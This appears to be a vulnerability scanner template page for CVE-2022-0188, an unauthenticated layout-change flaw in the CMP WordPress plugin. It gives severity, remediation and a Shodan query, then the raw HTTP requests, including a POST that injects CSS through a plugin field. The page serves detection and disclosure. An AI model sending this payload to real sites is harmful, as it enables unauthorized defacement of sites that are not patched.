| Title | CMP WordPress < 4.0.19 - Broken Access Control |
|---|---|
| Author | pussycat0x |
| Severity | Medium |
| Impact | Unauthenticated users can alter the coming soon page layout, potentially misleading visitors or causing defacement. |
| Remediation | Update to version 4.0.19 or later. |
| Shodan Query | html:"wp-content/plugins/cmp-coming-soon-maintenance" |
| Tags | cve cve2022 wp-scan wordpress wp-plugin cmp intrusive |
CMP WordPress plugin < 4.0.19 contains an arbitrary page layout change caused by insufficient access control in the coming soon page feature, letting unauthenticated users modify the layout, exploit requires no authentication.
GET /wp-content/plugins/cmp-coming-soon-maintenance/readme.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
POST / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Content-Length: 109
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
niteoCS_footer_background_opacity_hardwork=0);body{background:url(38ooE3HsHHVtQ3DbbKG8zaxHwjP);}div{color:red
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0188.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-0188.pcap
N/AN/A